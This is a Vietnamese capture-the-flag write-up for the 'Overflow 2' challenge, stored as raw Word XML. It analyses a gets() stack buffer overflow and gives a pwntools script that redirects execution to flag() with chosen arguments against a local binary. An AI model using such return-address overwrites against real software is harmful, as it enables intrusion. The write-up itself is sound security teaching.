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55F" w:rsidRDefault="00743AB1" w:rsidP="00743AB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Write up Overflow 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743AB1" w:rsidRDefault="00743AB1" w:rsidP="00743AB1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00743AB1" w:rsidRDefault="00743AB1" w:rsidP="00743A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Đọc hiểu source code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650BA0" w:rsidRDefault="00650BA0" w:rsidP="00650B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0B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A45893" wp14:editId="39170402">
            <wp:extent cx="2591162" cy="571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AB1" w:rsidRDefault="00743AB1" w:rsidP="00743A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43A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47D31C" wp14:editId="2F171B97">
            <wp:extent cx="5943600" cy="2833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AB1" w:rsidRDefault="00743AB1" w:rsidP="00743AB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43AB1" w:rsidRDefault="00743AB1" w:rsidP="00743AB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 gồm 3 hàm:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650BA0" w:rsidRDefault="00743AB1" w:rsidP="00743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Đầu tiên, ta đọc hàm main( ) ,</w:t>
      </w:r>
      <w:r w:rsidR="00650BA0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> hàm main( ) chỉ gọi vuln( ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00743AB1" w:rsidRDefault="00650BA0" w:rsidP="00743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Tiếp theo đọc vuln( ), hàm vuln( ) khai báo 1 mảng kiểu char có số lượng phần tử là BUFSIZE=176.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650BA0" w:rsidRDefault="00650BA0" w:rsidP="00650BA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đó cho nhập vào buf bằng hàm gets( ) , rồi in ra mảng kí tự vừa nhập.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00650BA0" w:rsidRDefault="00650BA0" w:rsidP="00650B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thấy rằng trong main, không hề gọi hàm flag( ) . </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B283E" w:rsidRDefault="00C50A37" w:rsidP="00C50A3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Đọc hàm flag() xem nó làm gì, hàm flag( )  nhận 2 tham số là arg1 và arg2, khai báo 1 mảng kiểu kí tự có số lượng phần tử FLAGSIZE=64, sau đó nó mở file flag.txt, đưa dữ liệu trong file flag.txt vào mảng buf. Sau đó nó kiểm tra biểu thức (arg1 != 0XDEADBEEF) và biểu thứ</w:t>
      </w:r>
      <w:r w:rsidR="00D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c ( arg2 != 0XCODE00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D ) , nếu 1 trong 2 biểu thứ</w:t>
      </w:r>
      <w:r w:rsidR="005B283E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>c đúng thì nó return, kết thúc hàm. Còn nếu cả 2 biểu thức đều sai thì nó sẽ in ra mảng buf cho chúng ta, tức là in ra flag cho chúng ta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B283E" w:rsidRDefault="005B283E" w:rsidP="005B28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lỗi và ý tưởng khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B283E" w:rsidRDefault="005B283E" w:rsidP="005B28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lỗi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B283E" w:rsidRDefault="005B283E" w:rsidP="005B283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Ta thấy trong hàm vuln( ) , gets(buf) không kiểm tra số lượng kí tự mà chúng ta nhập vào, vậy nếu chúng ta nhập vào số lượng kí tự &gt; số lượng phần tử buf cho phép thì sẽ dẫn đến lỗi Buffer overflow. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005B283E" w:rsidRDefault="005B283E" w:rsidP="005B28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Ý tưởng khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="005B283E" w:rsidP="00DA74E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Mục đích của chúng ta là lấy flag. Ở đây chúng ta có hàm flag để in ra flag cho chúng ta nhưng trong flow của chương trình lại không gọi hàm flag( ) . Vậy mục đích của ta là làm sao gọi được hàm flag(</w:t>
      </w:r>
      <w:r w:rsidR="00DA74EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>arg1, arg2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00DA74EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> với 2 tham số arg1, arg2 phù hợp để in ra được flag thật sự. </w:t>
      </w:r>
      <w:r w:rsidR="00DA74EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t>- Chúng ta có lỗi buffer overflow, với lỗi này, ta có thể ghi đè lên địa chỉ return của hàm vuln( )  thành địa chỉ hàm flag( ) , để khi thực thi xong hàm vuln( ) thay vì return main, nó sẽ return về hàm flag( ).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74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Kiểm tra file binary có thuận lợi cho hướng khai thác hay không </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74E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A74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94F9E0" wp14:editId="56B593CE">
            <wp:extent cx="5296639" cy="22672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4EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74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File này không có check canary và cũng no pie. Thuận lợi cho hướng khai thác. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74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Khai thác:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74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Pesudo payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA74E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Payload = ‘a’*offset + flag_address</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA74EA" w:rsidRDefault="00DA74EA" w:rsidP="00DA7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Đối với payload </w:t>
      </w:r>
      <w:r w:rsidR="00E418B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>trên, ta chỉ mới gọi hàm flag( ), chứ chưa đưa tham s</w:t>
      </w:r>
      <w:r w:rsidR="00E418B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E418B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E418B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>số cho hàm flag( ) , nên chương trình vẫn chạy sai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E418B6" w:rsidRDefault="00E418B6" w:rsidP="00DA7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418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5883E6" wp14:editId="2100DC45">
            <wp:extent cx="4483100" cy="977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6207" cy="98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6E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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Sau khi debug thì ta thấy, chương trình sẽ so sánh [ebp+8] vớ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t>0xdeadbeef, tức arg1 là [ebp+8]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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Tương tự, arg2 là [ebp+0xc] </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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Vậy payload của ta có dạng:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D427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4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Payload = ‘a’*offset + flag_address</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + [4 bytes return] + [arg1] + [arg2]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D427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Với arg1 = 0xdeadbeef và arg2 = 0xcode00d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D427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Real code:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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Offset : các bạn tự tìm nhé</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">flag_add : các bạn tự tìm </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00FF4B79" w:rsidP="00D4276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= process('./vuln</w:t>
      </w:r>
      <w:r w:rsidR="00D4276E" w:rsidRPr="00D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>raw_input('debug')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">flag = 0x80485e6 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">main = 0x80486b5 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload = 'a'*0xbc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload += p32(flag)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload += p32(main)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload += p32(0xDEADBEEF)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>payload += p32(0xC0DED00D)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>s.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF4B79" w:rsidRPr="00FF4B79" w:rsidRDefault="00FF4B79" w:rsidP="00FF4B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Vậy mình đã giải xong bài này. Chúc các bạn làm bài vui vẻ. </w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00D4276E" w:rsidRPr="00DA74EA" w:rsidRDefault="00D4276E" w:rsidP="00D4276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D4276E" w:rsidRPr="00DA7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77C37"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06DA1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A68DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E7098E6"/>
    <w:lvl w:ilvl="0" w:tplc="969EBDB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7E4391"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8C4CC9FC"/>
    <w:lvl w:ilvl="0" w:tplc="A7AC1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6BE"/>
    <w:rsid w:val="005B283E"/>
    <w:rsid w:val="00650BA0"/>
    <w:rsid w:val="00743AB1"/>
    <w:rsid w:val="00C50A37"/>
    <w:rsid w:val="00D4276E"/>
    <w:rsid w:val="00DA74EA"/>
    <w:rsid w:val="00E418B6"/>
    <w:rsid w:val="00E746BE"/>
    <w:rsid w:val="00F0455F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3BC0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{84EF25FE-C867-40EE-A926-3B2198B9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TUAN</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>LE TUAN</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-10-17T01:37:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-17T03:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>